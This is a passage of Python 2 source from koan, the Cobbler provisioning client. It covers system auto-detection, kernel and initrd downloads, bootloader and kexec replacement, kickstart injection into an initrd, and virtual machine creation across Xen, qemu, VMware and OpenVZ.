return None
#---------------------------------------------------
def autodetect_system(self, allow_interactive=False):
"""
Determine the name of the cobbler system record that
matches this MAC address.
"""
systems = self.get_data("systems")
my_netinfo = utils.get_network_info()
my_interfaces = my_netinfo.keys()
mac_criteria = []
ip_criteria = []
for my_interface in my_interfaces:
mac_criteria.append(my_netinfo[my_interface]["mac_address"].upper())
ip_criteria.append(my_netinfo[my_interface]["ip_address"])
detected_systems = []
systems = self.get_data("systems")
for system in systems:
obj_name = system["name"]
for (obj_iname, obj_interface) in system['interfaces'].iteritems():
mac = obj_interface["mac_address"].upper()
ip = obj_interface["ip_address"].upper()
for my_mac in mac_criteria:
if mac == my_mac:
detected_systems.append(obj_name)
for my_ip in ip_criteria:
if ip == my_ip:
detected_systems.append(obj_name)
detected_systems = utils.uniqify(detected_systems)
if len(detected_systems) > 1:
raise InfoException, "Error: Multiple systems matched"
elif len(detected_systems) == 0:
if not allow_interactive:
mac_criteria = utils.uniqify(mac_criteria, purge="?")
ip_criteria = utils.uniqify(ip_criteria, purge="?")
raise InfoException, "Error: Could not find a matching system with MACs: %s or IPs: %s" % (",".join(mac_criteria), ",".join(ip_criteria))
else:
return None
elif len(detected_systems) == 1:
print "- Auto detected: %s" % detected_systems[0]
return detected_systems[0]
#---------------------------------------------------
def safe_load(self,hashv,primary_key,alternate_key=None,default=None):
if hashv.has_key(primary_key):
return hashv[primary_key]
elif alternate_key is not None and hashv.has_key(alternate_key):
return hashv[alternate_key]
else:
return default
#---------------------------------------------------
def net_install(self,after_download):
"""
Actually kicks off downloads and auto-ks or virt installs
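        net_install() resolves the profile, system, or image data from the
        cobbler server, optionally downloads kernel/initrd, and then hands the
        resulting hash to the supplied callback, e.g.:
            def after_download(self, profile_data):
                ...act on profile_data...
            return self.net_install(after_download)
        display() and virt() below both drive it this way.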
"""
# initialise the profile, from the server if any
if self.profile:
profile_data = self.get_data("profile",self.profile)
elif self.system:
profile_data = self.get_data("system",self.system)
elif self.image:
profile_data = self.get_data("image",self.image)
else:
# shouldn't end up here, right?
profile_data = {}
if profile_data.get("kickstart","") != "":
# fix URLs
if profile_data["kickstart"][0] == "/" or profile_data["template_remote_kickstarts"]:
if not self.system:
profile_data["kickstart"] = "http://%s/cblr/svc/op/ks/profile/%s" % (profile_data['http_server'], profile_data['name'])
else:
profile_data["kickstart"] = "http://%s/cblr/svc/op/ks/system/%s" % (profile_data['http_server'], profile_data['name'])
# If breed is ubuntu/debian we need to source the install tree differently
# as preseeds are used instead of kickstarts.
if profile_data["breed"] in [ "ubuntu", "debian" ]:
self.get_install_tree_for_debian_ubuntu(profile_data)
else:
                # find the kickstart source tree from the kickstart file
self.get_install_tree_from_kickstart(profile_data)
# if we found an install_tree, and we don't have a kernel or initrd
# use the ones in the install_tree
if self.safe_load(profile_data,"install_tree"):
if not self.safe_load(profile_data,"kernel"):
profile_data["kernel"] = profile_data["install_tree"] + "/images/pxeboot/vmlinuz"
if not self.safe_load(profile_data,"initrd"):
profile_data["initrd"] = profile_data["install_tree"] + "/images/pxeboot/initrd.img"
# find the correct file download location
if not self.is_virt:
if os.path.exists("/boot/efi/EFI/redhat/elilo.conf"):
# elilo itanium support, may actually still work
download = "/boot/efi/EFI/redhat"
else:
# whew, we have a sane bootloader
download = "/boot"
else:
# ensure we have a good virt type choice and know where
# to download the kernel/initrd
if self.virt_type is None:
self.virt_type = self.safe_load(profile_data,'virt_type',default=None)
if self.virt_type is None or self.virt_type == "":
self.virt_type = "auto"
# if virt type is auto, reset it to a value we can actually use
if self.virt_type == "auto":
if profile_data.get("xml_file","") != "":
raise InfoException("xmlfile based installations are not supported")
elif profile_data.has_key("file"):
print "- ISO or Image based installation, always uses --virt-type=qemu"
self.virt_type = "qemu"
else:
# FIXME: auto never selects vmware, maybe it should if we find it?
if not ANCIENT_PYTHON:
cmd = sub_process.Popen("/bin/uname -r", stdout=sub_process.PIPE, shell=True)
uname_str = cmd.communicate()[0]
if uname_str.find("xen") != -1:
self.virt_type = "xenpv"
elif os.path.exists("/usr/bin/qemu-img"):
self.virt_type = "qemu"
else:
# assume Xen, we'll check to see if virt-type is really usable later.
raise InfoException, "Not running a Xen kernel and qemu is not installed"
print "- no virt-type specified, auto-selecting %s" % self.virt_type
# now that we've figured out our virt-type, let's see if it is really usable
# rather than showing obscure error messages from Xen to the user :)
if self.virt_type in [ "xenpv", "xenfv" ]:
cmd = sub_process.Popen("uname -r", stdout=sub_process.PIPE, shell=True)
uname_str = cmd.communicate()[0]
# correct kernel on dom0?
if uname_str < "2.6.37" and uname_str.find("xen") == -1:
raise InfoException("kernel >= 2.6.37 or kernel-xen needs to be in use")
# xend installed?
if not os.path.exists("/usr/sbin/xend"):
raise InfoException("xen package needs to be installed")
# xend running?
rc = sub_process.call("/usr/sbin/xend status", stderr=None, stdout=None, shell=True)
if rc != 0:
raise InfoException("xend needs to be started")
# for qemu
if self.virt_type in [ "qemu", "kvm" ]:
# qemu package installed?
if not os.path.exists("/usr/bin/qemu-img"):
raise InfoException("qemu package needs to be installed")
# is libvirt new enough?
cmd = sub_process.Popen("rpm -q python-virtinst", stdout=sub_process.PIPE, shell=True)
version_str = cmd.communicate()[0]
if version_str.find("virtinst-0.1") != -1 or version_str.find("virtinst-0.0") != -1:
raise InfoException("need python-virtinst >= 0.2 to do installs for qemu/kvm")
# for vmware
if self.virt_type == "vmware" or self.virt_type == "vmwarew":
# FIXME: if any vmware specific checks are required (for deps) do them here.
pass
if self.virt_type == "virt-image":
if not os.path.exists("/usr/bin/virt-image"):
raise InfoException("virt-image not present, downlevel virt-install package?")
# for both virt types
if os.path.exists("/etc/rc.d/init.d/libvirtd"):
rc = sub_process.call("/sbin/service libvirtd status", stdout=None, shell=True)
if rc != 0:
# libvirt running?
raise InfoException("libvirtd needs to be running")
if self.virt_type in [ "xenpv" ]:
# we need to fetch the kernel/initrd to do this
download = "/var/lib/xen"
elif self.virt_type in [ "xenfv", "vmware", "vmwarew" ] :
# we are downloading sufficient metadata to initiate PXE, no D/L needed
download = None
else: # qemu
# fullvirt, can use set_location in virtinst library, no D/L needed yet
download = None
# download required files
if not self.is_display and download is not None:
self.get_distro_files(profile_data, download)
# perform specified action
after_download(self, profile_data)
#---------------------------------------------------
def get_install_tree_from_kickstart(self,profile_data):
"""
        Scan the kickstart configuration for either a "url" or "nfs" command
        and take the install_tree URL from that.
"""
if profile_data["breed"] == "suse":
kopts = profile_data["kernel_options"]
options = kopts.split(" ")
for opt in options:
if opt.startswith("install="):
profile_data["install_tree"] = opt.replace("install=","")
break
else:
try:
raw = utils.urlread(profile_data["kickstart"])
lines = raw.splitlines()
method_re = re.compile('(?P<urlcmd>\s*url\s.*)|(?P<nfscmd>\s*nfs\s.*)')
url_parser = OptionParser()
url_parser.add_option("--url", dest="url")
nfs_parser = OptionParser()
nfs_parser.add_option("--dir", dest="dir")
nfs_parser.add_option("--server", dest="server")
for line in lines:
match = method_re.match(line)
if match:
cmd = match.group("urlcmd")
if cmd:
(options,args) = url_parser.parse_args(shlex.split(cmd)[1:])
profile_data["install_tree"] = options.url
break
cmd = match.group("nfscmd")
if cmd:
(options,args) = nfs_parser.parse_args(shlex.split(cmd)[1:])
profile_data["install_tree"] = "nfs://%s:%s" % (options.server,options.dir)
break
if self.safe_load(profile_data,"install_tree"):
print "install_tree:", profile_data["install_tree"]
else:
print "warning: kickstart found but no install_tree found"
except:
                # unable to download the kickstart, however this might not
# be an error. For instance, xen FV installations of non
# kickstart OS's...
pass
#---------------------------------------------------
def get_install_tree_for_debian_ubuntu(self, profile_data):
"""
Split ks_meta to obtain the tree path. Generate the install_tree
using the http_server and the tree obtained from splitting ks_meta
"""
try:
tree = profile_data["ks_meta"].split("@@")[-1].strip()
# Ensure we only take the tree in case ks_meta args are passed
tree = tree.split()[0]
profile_data["install_tree"] = tree
if self.safe_load(profile_data,"install_tree"):
print "install_tree:", profile_data["install_tree"]
else:
print "warning: kickstart found but no install_tree found"
except:
pass
#---------------------------------------------------
def list(self,what):
if what not in [ "images", "profiles", "systems", "distros", "repos" ]:
raise InfoException("koan does not know how to list that")
data = self.get_data(what)
for x in data:
if x.has_key("name"):
print x["name"]
return True
#---------------------------------------------------
def display(self):
def after_download(self, profile_data):
for x in DISPLAY_PARAMS:
if profile_data.has_key(x):
value = profile_data[x]
if x == 'kernel_options':
value = self.calc_kernel_args(profile_data)
print "%20s : %s" % (x, value)
return self.net_install(after_download)
#---------------------------------------------------
def virt(self):
"""
Handle virt provisioning.
"""
def after_download(self, profile_data):
self.virt_net_install(profile_data)
return self.net_install(after_download)
#---------------------------------------------------
def update_files(self):
"""
Contact the cobbler server and wget any config-management
files in cobbler that we are providing to nodes. Basically
        this turns cobbler into a lightweight configuration management
        system for folks who do not need a more complex CMS.
Read more at:
https://github.com/cobbler/cobbler/wiki/Built-in-configuration-management
"""
# FIXME: make this a utils.py function
if self.profile:
profile_data = self.get_data("profile",self.profile)
elif self.system:
profile_data = self.get_data("system",self.system)
elif self.image:
profile_data = self.get_data("image",self.image)
else:
# shouldn't end up here, right?
profile_data = {}
# BOOKMARK
template_files = profile_data["template_files"]
template_files = utils.input_string_or_hash(template_files)
template_keys = template_files.keys()
print "- template map: %s" % template_files
print "- processing for files to download..."
for src in template_keys:
dest = template_files[src]
save_as = dest
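            # encode the destination path for the cobbler template service URL:
            # double any literal underscores, then turn "/" into "_"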
dest = dest.replace("_","__")
dest = dest.replace("/","_")
if not save_as.startswith("/"):
# this is a file in the template system that is not to be downloaded
continue
print "- file: %s" % save_as
pattern = "http://%s/cblr/svc/op/template/%s/%s/path/%s"
if profile_data.has_key("interfaces"):
url = pattern % (profile_data["http_server"],"system",profile_data["name"],dest)
else:
url = pattern % (profile_data["http_server"],"profile",profile_data["name"],dest)
if not os.path.exists(os.path.dirname(save_as)):
os.makedirs(os.path.dirname(save_as))
cmd = [ "/usr/bin/wget", url, "--output-document", save_as ]
utils.subprocess_call(cmd)
return True
#---------------------------------------------------
def update_config(self):
"""
Contact the cobbler server and update the system configuration using
cobbler's built-in configuration management. Configs are based on
a combination of mgmt-classes assigned to the system, profile, and
distro.
"""
# FIXME get hostname from utils?
hostname = socket.gethostname()
server = self.xmlrpc_server
try:
config = server.get_config_data(hostname)
except:
traceback.print_exc()
self.connect_fail()
# FIXME should we version this, maybe append a timestamp?
node_config_data = "/var/lib/koan/config/localconfig.json"
f = open(node_config_data, 'w')
f.write(config)
f.close()
print "- Starting configuration run for %s" % (hostname)
runtime_start = time.time()
configure = configurator.KoanConfigure(config)
stats = configure.run()
runtime_end = time.time()
if self.summary:
pstats = (stats["pkg"]['nsync'],stats["pkg"]['osync'],stats["pkg"]['fail'],stats["pkg"]['runtime'])
dstats = (stats["dir"]['nsync'],stats["dir"]['osync'],stats["dir"]['fail'],stats["dir"]['runtime'])
fstats = (stats["files"]['nsync'],stats["files"]['osync'],stats["files"]['fail'],stats["files"]['runtime'])
nsync = pstats[0] + dstats[0] + fstats[0]
osync = pstats[1] + dstats[1] + fstats[1]
fail = pstats[2] + dstats[2] + fstats[2]
total_resources = (nsync + osync + fail)
total_runtime = (runtime_end - runtime_start)
print
print "\tResource Report"
print "\t-------------------------"
print "\t In Sync: %d" % nsync
print "\tOut of Sync: %d" % osync
print "\t Fail: %d" % fail
print "\t-------------------------"
print "\tTotal Resources: %d" % total_resources
print "\t Total Runtime: %.02f" % total_runtime
for status in ["repos_status", "ldap_status", "monit_status"]:
if status in stats:
print
print "\t%s" % status
print "\t-------------------------"
print "\t%s" % stats[status]
print "\t-------------------------"
print
print "\tResource |In Sync|OO Sync|Failed|Runtime"
print "\t----------------------------------------"
print "\t Packages: %d %d %d %.02f" % pstats
print "\t Directories: %d %d %d %.02f" % dstats
print "\t Files: %d %d %d %.02f" % fstats
print
#---------------------------------------------------
def kexec_replace(self):
"""
Prepare to morph existing system by downloading new kernel and initrd
and preparing kexec to execute them. Allow caller to do final 'kexec
-e' invocation; this allows modules such as network drivers to be
        unloaded (for cases where an immediate kexec would leave the driver in
        an invalid state).
"""
def after_download(self, profile_data):
k_args = self.calc_kernel_args(profile_data)
kickstart = self.safe_load(profile_data,'kickstart')
arch = self.safe_load(profile_data,'arch')
(make, version) = utils.os_release()
if (make == "centos" and version < 6) or (make == "redhat" and version < 6) or (make == "fedora" and version < 10):
# embed the initrd in the kickstart file because of libdhcp and/or pump
                # needing the help due to a potential DHCP timeout in certain
# network configs.
if self.embed_kickstart:
self.build_initrd(
self.safe_load(profile_data,'initrd_local'),
kickstart,
profile_data
)
# Validate kernel argument length (limit depends on architecture --
# see asm-*/setup.h). For example:
# asm-i386/setup.h:#define COMMAND_LINE_SIZE 256
# asm-ia64/setup.h:#define COMMAND_LINE_SIZE 512
# asm-powerpc/setup.h:#define COMMAND_LINE_SIZE 512
# asm-s390/setup.h:#define COMMAND_LINE_SIZE 896
# asm-x86_64/setup.h:#define COMMAND_LINE_SIZE 256
# arch/x86/include/asm/setup.h:#define COMMAND_LINE_SIZE 2048
if arch.startswith("ppc") or arch.startswith("ia64"):
if len(k_args) > 511:
raise InfoException, "Kernel options are too long, 512 chars exceeded: %s" % k_args
elif arch.startswith("s390"):
if len(k_args) > 895:
raise InfoException, "Kernel options are too long, 896 chars exceeded: %s" % k_args
elif len(k_args) > 2048:
raise InfoException, "Kernel options are too long, 2048 chars exceeded: %s" % k_args
utils.subprocess_call([
'kexec',
'--load',
'--initrd=%s' % (self.safe_load(profile_data,'initrd_local'),),
'--command-line=%s' % (k_args,),
self.safe_load(profile_data,'kernel_local')
])
print "Kernel loaded; run 'kexec -e' to execute"
return self.net_install(after_download)
#---------------------------------------------------
def get_boot_loader_info(self):
if ANCIENT_PYTHON:
# FIXME: implement this to work w/o subprocess
if os.path.exists("/etc/grub.conf"):
return (0, "grub")
else:
return (0, "lilo")
cmd = [ "/sbin/grubby", "--bootloader-probe" ]
probe_process = sub_process.Popen(cmd, stdout=sub_process.PIPE)
which_loader = probe_process.communicate()[0]
return probe_process.returncode, which_loader
def replace(self):
"""
Handle morphing an existing system through downloading new
kernel, new initrd, and installing a kickstart in the initrd,
then manipulating grub.
"""
try:
shutil.rmtree("/var/spool/koan")
except OSError, (err, msg):
if err != errno.ENOENT:
raise
try:
os.makedirs("/var/spool/koan")
except OSError, (err, msg):
if err != errno.EEXIST:
raise
def after_download(self, profile_data):
use_grubby = False
use_grub2 = False
(make, version) = utils.os_release()
if make in ['ubuntu', 'debian']:
if not os.path.exists("/usr/sbin/update-grub"):
raise InfoException, "grub2 is not installed"
use_grub2 = True
else:
if not os.path.exists("/sbin/grubby"):
raise InfoException, "grubby is not installed"
use_grubby = True
k_args = self.calc_kernel_args(profile_data,replace_self=1)
kickstart = self.safe_load(profile_data,'kickstart')
if (make == "centos" and version < 6) or (make == "redhat" and version < 6) or (make == "fedora" and version < 10):
# embed the initrd in the kickstart file because of libdhcp and/or pump
                # needing the help due to a potential DHCP timeout in certain
# network configs.
if self.embed_kickstart:
self.build_initrd(
self.safe_load(profile_data,'initrd_local'),
kickstart,
profile_data
)
if not ANCIENT_PYTHON:
arch_cmd = sub_process.Popen("/bin/uname -m", stdout=sub_process.PIPE, shell=True)
arch = arch_cmd.communicate()[0]
else:
arch = "i386"
# Validate kernel argument length (limit depends on architecture --
# see asm-*/setup.h). For example:
# asm-i386/setup.h:#define COMMAND_LINE_SIZE 256
# asm-ia64/setup.h:#define COMMAND_LINE_SIZE 512
# asm-powerpc/setup.h:#define COMMAND_LINE_SIZE 512
# asm-s390/setup.h:#define COMMAND_LINE_SIZE 896
# asm-x86_64/setup.h:#define COMMAND_LINE_SIZE 256
# arch/x86/include/asm/setup.h:#define COMMAND_LINE_SIZE 2048
if not ANCIENT_PYTHON:
if arch.startswith("ppc") or arch.startswith("ia64"):
if len(k_args) > 511:
raise InfoException, "Kernel options are too long, 512 chars exceeded: %s" % k_args
elif arch.startswith("s390"):
if len(k_args) > 895:
raise InfoException, "Kernel options are too long, 896 chars exceeded: %s" % k_args
elif len(k_args) > 2048:
raise InfoException, "Kernel options are too long, 2048 chars exceeded: %s" % k_args
if use_grubby:
cmd = [ "/sbin/grubby",
"--add-kernel", self.safe_load(profile_data,'kernel_local'),
"--initrd", self.safe_load(profile_data,'initrd_local'),
"--args", "\"%s\"" % k_args
]
if not self.no_copy_default:
cmd.append("--copy-default")
boot_probe_ret_code, probe_output = self.get_boot_loader_info()
if boot_probe_ret_code == 0 and string.find(probe_output, "lilo") >= 0:
cmd.append("--lilo")
if self.add_reinstall_entry:
cmd.append("--title=Reinstall")
else:
cmd.append("--make-default")
cmd.append("--title=kick%s" % int(time.time()))
if self.live_cd:
cmd.append("--bad-image-okay")
cmd.append("--boot-filesystem=/")
cmd.append("--config-file=/tmp/boot/boot/grub/grub.conf")
# Are we running on ppc?
if not ANCIENT_PYTHON:
if arch.startswith("ppc"):
cmd.append("--yaboot")
elif arch.startswith("s390"):
cmd.append("--zipl")
utils.subprocess_call(cmd)
# Any post-grubby processing required (e.g. ybin, zipl, lilo)?
if not ANCIENT_PYTHON and arch.startswith("ppc"):
# FIXME - CHRP hardware uses a 'PPC PReP Boot' partition and doesn't require running ybin
print "- applying ybin changes"
cmd = [ "/sbin/ybin" ]
utils.subprocess_call(cmd)
elif not ANCIENT_PYTHON and arch.startswith("s390"):
print "- applying zipl changes"
cmd = [ "/sbin/zipl" ]
utils.subprocess_call(cmd)
else:
# if grubby --bootloader-probe returns lilo,
# apply lilo changes
if boot_probe_ret_code == 0 and string.find(probe_output, "lilo") != -1:
print "- applying lilo changes"
cmd = [ "/sbin/lilo" ]
utils.subprocess_call(cmd)
elif use_grub2:
# Use grub2 for --replace-self
kernel_local = self.safe_load(profile_data,'kernel_local')
initrd_local = self.safe_load(profile_data,'initrd_local')
# Set name for grub2 menuentry
if self.add_reinstall_entry:
name = "Reinstall: %s" % profile_data['name']
else:
name = "%s" % profile_data['name']
# Set paths for Ubuntu/Debian
# TODO: Add support for other distros when they ship grub2
if make in ['ubuntu', 'debian']:
grub_file = "/etc/grub.d/42_koan"
grub_default_file = "/etc/default/grub"
cmd = ["update-grub"]
default_cmd = ['sed', '-i', 's/^GRUB_DEFAULT\=.*$/GRUB_DEFAULT="%s"/g' % name, grub_default_file]
# Create grub2 menuentry
grub_entry = """
cat <<EOF
menuentry "%s" {
linux %s %s
initrd %s
}
EOF
""" % (name, kernel_local, k_args, initrd_local)
# Save grub2 menuentry
fd = open(grub_file,"w")
fd.write(grub_entry)
fd.close()
os.chmod(grub_file, 0755)
# Set default grub entry for reboot
if not self.add_reinstall_entry:
print "- setting grub2 default entry"
sub_process.call(default_cmd)
# Run update-grub
utils.subprocess_call(cmd)
if not self.add_reinstall_entry:
print "- reboot to apply changes"
else:
print "- reinstallation entry added"
return self.net_install(after_download)
#---------------------------------------------------
def get_insert_script(self,initrd):
"""
Create bash script for inserting kickstart into initrd.
Code heavily borrowed from internal auto-ks scripts.
"""
return r"""
cd /var/spool/koan
mkdir initrd
gzip -dc %s > initrd.tmp
if mount -o loop -t ext2 initrd.tmp initrd >&/dev/null ; then
cp ks.cfg initrd/
ln initrd/ks.cfg initrd/tmp/ks.cfg
umount initrd
gzip -c initrd.tmp > initrd_final
else
echo "mount failed; treating initrd as a cpio archive..."
cd initrd
cpio -id <../initrd.tmp
cp /var/spool/koan/ks.cfg .
ln ks.cfg tmp/ks.cfg
find . | cpio -o -H newc | gzip -9 > ../initrd_final
echo "...done"
fi
""" % initrd
#---------------------------------------------------
def build_initrd(self,initrd,kickstart,data):
"""
Crack open an initrd and install the kickstart file.
"""
# save kickstart to file
ksdata = utils.urlread(kickstart)
fd = open("/var/spool/koan/ks.cfg","w+")
if ksdata is not None:
fd.write(ksdata)
fd.close()
# handle insertion of kickstart based on type of initrd
fd = open("/var/spool/koan/insert.sh","w+")
fd.write(self.get_insert_script(initrd))
fd.close()
utils.subprocess_call([ "/bin/bash", "/var/spool/koan/insert.sh" ])
shutil.copyfile("/var/spool/koan/initrd_final", initrd)
#---------------------------------------------------
def connect_fail(self):
raise InfoException, "Could not communicate with %s:%s" % (self.server, self.port)
#---------------------------------------------------
def get_data(self,what,name=None):
try:
if what[-1] == "s":
data = getattr(self.xmlrpc_server, "get_%s" % what)()
else:
data = getattr(self.xmlrpc_server, "get_%s_for_koan" % what)(name)
except:
traceback.print_exc()
self.connect_fail()
if data == {}:
raise InfoException("No entry/entries found")
return data
#---------------------------------------------------
def get_ips(self,strdata):
"""
Return a list of IP address strings found in argument.
warning: not IPv6 friendly
"""
return re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',strdata)
#---------------------------------------------------
def get_macs(self,strdata):
"""
Return a list of MAC address strings found in argument.
"""
        return re.findall(r'[A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2}', strdata.upper())
#---------------------------------------------------
def is_ip(self,strdata):
"""
Is strdata an IP?
warning: not IPv6 friendly
"""
return self.get_ips(strdata) and True or False
#---------------------------------------------------
def is_mac(self,strdata):
"""
Return whether the argument is a mac address.
"""
return self.get_macs(strdata) and True or False
#---------------------------------------------------
def get_distro_files(self,profile_data, download_root):
"""
Using distro data (fetched from bootconf tree), determine
what kernel and initrd to download, and save them locally.
"""
os.chdir(download_root)
distro = self.safe_load(profile_data,'distro')
kernel = self.safe_load(profile_data,'kernel')
initrd = self.safe_load(profile_data,'initrd')
kernel_short = os.path.basename(kernel)
initrd_short = os.path.basename(initrd)
kernel_save = "%s/%s_koan" % (download_root, kernel_short)
initrd_save = "%s/%s_koan" % (download_root, initrd_short)
if self.server:
if kernel[0] == "/":
kernel = "http://%s/cobbler/images/%s/%s" % (profile_data["http_server"], distro, kernel_short)
if initrd[0] == "/":
initrd = "http://%s/cobbler/images/%s/%s" % (profile_data["http_server"], distro, initrd_short)
try:
print "downloading initrd %s to %s" % (initrd_short, initrd_save)
print "url=%s" % initrd
utils.urlgrab(initrd,initrd_save)
print "downloading kernel %s to %s" % (kernel_short, kernel_save)
print "url=%s" % kernel
utils.urlgrab(kernel,kernel_save)
except:
traceback.print_exc()
raise InfoException, "error downloading files"
profile_data['kernel_local'] = kernel_save
profile_data['initrd_local'] = initrd_save
#---------------------------------------------------
def calc_kernel_args(self, pd, replace_self=0):
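        # build the kernel command line: kickstart/autoyast/preseed pointer plus
        # cobbler kernel_options, optional static interface settings, and any
        # kopts override supplied on the koan command line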
kickstart = self.safe_load(pd,'kickstart')
options = self.safe_load(pd,'kernel_options',default='')
breed = self.safe_load(pd,'breed')
kextra = ""
if kickstart is not None and kickstart != "":
if breed is not None and breed == "suse":
kextra = "autoyast=" + kickstart
elif breed is not None and breed == "debian" or breed =="ubuntu":
kextra = "auto url=" + kickstart
else:
kextra = "ks=" + kickstart
if options !="":
kextra = kextra + " " + options
# parser issues? lang needs a trailing = and somehow doesn't have it.
# convert the from-cobbler options back to a hash
# so that we can override it in a way that works as intended
hashv = utils.input_string_or_hash(kextra)
if self.static_interface is not None and (breed == "redhat" or breed == "suse"):
interface_name = self.static_interface
interfaces = self.safe_load(pd, "interfaces")
if interface_name.startswith("eth"):
alt_interface_name = interface_name.replace("eth", "intf")
interface_data = self.safe_load(interfaces, interface_name, alt_interface_name)
else:
interface_data = self.safe_load(interfaces, interface_name)
ip = self.safe_load(interface_data, "ip_address")
netmask = self.safe_load(interface_data, "netmask")
gateway = self.safe_load(pd, "gateway")
dns = self.safe_load(pd, "name_servers")
if breed == "suse":
hashv["netdevice"] = self.static_interface
else:
hashv["ksdevice"] = self.static_interface
if ip is not None:
if breed == "suse":
hashv["hostip"] = ip
else:
hashv["ip"] = ip
if netmask is not None:
hashv["netmask"] = netmask
if gateway is not None:
hashv["gateway"] = gateway
if dns is not None:
if breed == "suse":
hashv["nameserver"] = dns[0]
else:
hashv["dns"] = ",".join(dns)
if replace_self and self.embed_kickstart:
hashv["ks"] = "file:ks.cfg"
if self.kopts_override is not None:
hash2 = utils.input_string_or_hash(self.kopts_override)
hashv.update(hash2)
options = utils.hash_to_string(hashv)
options = string.replace(options, "lang ","lang= ")
# if using ksdevice=bootif that only works for PXE so replace
# it with something that will work
options = string.replace(options, "ksdevice=bootif","ksdevice=link")
return options
#---------------------------------------------------
def virt_net_install(self,profile_data):
"""
Invoke virt guest-install (or tweaked copy thereof)
"""
pd = profile_data
self.load_virt_modules()
arch = self.safe_load(pd,'arch','x86')
kextra = self.calc_kernel_args(pd)
(uuid, create_func, fullvirt, can_poll) = self.virt_choose(pd)
virtname = self.calc_virt_name(pd)
ram = self.calc_virt_ram(pd)
vcpus = self.calc_virt_cpus(pd)
path_list = self.calc_virt_path(pd, virtname)
size_list = self.calc_virt_filesize(pd)
driver_list = self.calc_virt_drivers(pd)
if self.virt_type == 'openvz':
disks = None
else:
disks = self.merge_disk_data(path_list,size_list,driver_list)
virt_auto_boot = self.calc_virt_autoboot(pd, self.virt_auto_boot)
results = create_func(
name = virtname,
ram = ram,
disks = disks,
uuid = uuid,
extra = kextra,
vcpus = vcpus,
profile_data = profile_data,
arch = arch,
no_gfx = self.no_gfx,
fullvirt = fullvirt,
bridge = self.virt_bridge,
virt_type = self.virt_type,
virt_auto_boot = virt_auto_boot,
qemu_driver_type = self.qemu_disk_type,
qemu_net_type = self.qemu_net_type,
qemu_machine_type = self.qemu_machine_type
)
#print results
if can_poll is not None and self.should_poll:
import libvirt
print "- polling for virt completion"
conn = None
if can_poll == "xen":
conn = libvirt.open(None)
elif can_poll == "qemu":
conn = libvirt.open("qemu:///system")
else:
raise InfoException("Don't know how to poll this virt-type")
ct = 0
while True:
time.sleep(3)
state = utils.get_vm_state(conn, virtname)
if state == "running":
print "- install is still running, sleeping for 1 minute (%s)" % ct
ct = ct + 1
time.sleep(60)
elif state == "crashed":
print "- the install seems to have crashed."
return "failed"
elif state == "shutdown":
print "- shutdown VM detected, is the install done? Restarting!"
utils.find_vm(conn, virtname).create()
return results
else:
raise InfoException("internal error, bad virt state")
if virt_auto_boot:
if self.virt_type in [ "xenpv", "xenfv" ]:
if not utils.create_xendomains_symlink(virtname):
print "- warning: failed to setup autoboot for %s, it will have to be configured manually" % virtname
elif self.virt_type in [ "qemu", "kvm" ]:
utils.libvirt_enable_autostart(virtname)
elif self.virt_type in [ "openvz" ]:
pass
else:
print "- warning: don't know how to autoboot this virt type yet"
# else...
return results
#---------------------------------------------------
def load_virt_modules(self):
try:
import xencreate
import qcreate
import imagecreate
except:
traceback.print_exc()
raise InfoException("no virtualization support available, install python-virtinst?")
#---------------------------------------------------
def virt_choose(self, pd):
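        # pick the virt backend module and creation function, and record whether
        # the guest is fullvirt and whether libvirt polling is supported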
fullvirt = False
can_poll = None
if (self.image is not None) and (pd["image_type"] == "virt-clone"):
fullvirt = True
uuid = None
import imagecreate
creator = imagecreate.start_install
elif self.virt_type in [ "xenpv", "xenfv" ]:
uuid = self.get_uuid(self.calc_virt_uuid(pd))
import xencreate
creator = xencreate.start_install
if self.virt_type == "xenfv":
fullvirt = True
can_poll = "xen"
elif self.virt_type in [ "qemu", "kvm" ] :
fullvirt = True
uuid = None
import qcreate
creator = qcreate.start_install
can_poll = "qemu"
elif self.virt_type == "vmware":
import vmwcreate
uuid = None
creator = vmwcreate.start_install
elif self.virt_type == "vmwarew":
import vmwwcreate
uuid = None
creator = vmwwcreate.start_install
elif self.virt_type == "openvz":
import openvzcreate
uuid = None
creator = openvzcreate.start_install
else:
raise InfoException, "Unspecified virt type: %s" % self.virt_type
return (uuid, creator, fullvirt, can_poll)
#---------------------------------------------------
def merge_disk_data(self, paths, sizes, drivers):
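        # pair each disk path with a size and driver; if fewer sizes or drivers
        # than paths were given, the last value is reused for the remaining disks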
counter = 0
disks = []
for p in paths:
path = paths[counter]
if counter >= len(sizes):
size = sizes[-1]
else:
size = sizes[counter]
if counter >= len(drivers):
driver = drivers[-1]
else:
driver = drivers[counter]
disks.append([path,size,driver])
counter = counter + 1
if len(disks) == 0:
print "paths: ", paths
print "sizes: ", sizes
print "drivers: ", drivers
raise InfoException, "Disk configuration not resolvable!"
return disks
#---------------------------------------------------
def calc_virt_name(self,profile_data):
if self.virt_name is not None:
# explicit override
name = self.virt_name
elif profile_data.has_key("interfaces"):
# this is a system object, just use the name
name = profile_data["name"]
else:
# just use the time, we used to use the MAC
# but that's not really reliable when there are more
# than one.
name = time.ctime(time.time())
# keep libvirt happy with the names
return name.replace(":","_").replace(" ","_")
#--------------------------------------------------
def calc_virt_autoboot(self,data,override_autoboot=False):
if override_autoboot:
return True
autoboot = self.safe_load(data,'virt_auto_boot',0)
autoboot = str(autoboot).lower()
if autoboot in [ "1", "true", "y", "yes" ]:
return True
return False
#--------------------------------------------------
def calc_virt_filesize(self,data,default_filesize=0):
# MAJOR FIXME: are there overrides?
size = self.safe_load(data,'virt_file_size','xen_file_size',0)
tokens = str(size).split(",")
accum = []
for t in tokens:
accum.append(self.calc_virt_filesize2(data,size=t))
return accum
#---------------------------------------------------
def calc_virt_filesize2(self,data,default_filesize=1,size=0):
"""
Assign a virt filesize if none is given in the profile.
"""
err = False
try:
int(size)
except:
err = True
if size is None or size == '':
err = True
if err:
print "invalid file size specified, using defaults"
return default_filesize
return int(size)
#---------------------------------------------------
def calc_virt_drivers(self,data):
driver = self.safe_load(data,'virt_disk_driver',default='raw')
tokens = driver.split(",")
accum = []
for t in tokens:
# FIXME: this list should be pulled out of
# the virtinst VirtualDisk class, but
# not all versions of virtinst have a
# nice list to use
if t in ('raw','qcow','aio'):
accum.append(t)
else:
print "invalid disk driver specified, defaulting to 'raw'"
accum.append('raw')
return accum
#---------------------------------------------------
def calc_virt_ram(self,data,default_ram=64):
"""
Assign a virt ram size if none is given in the profile.
"""
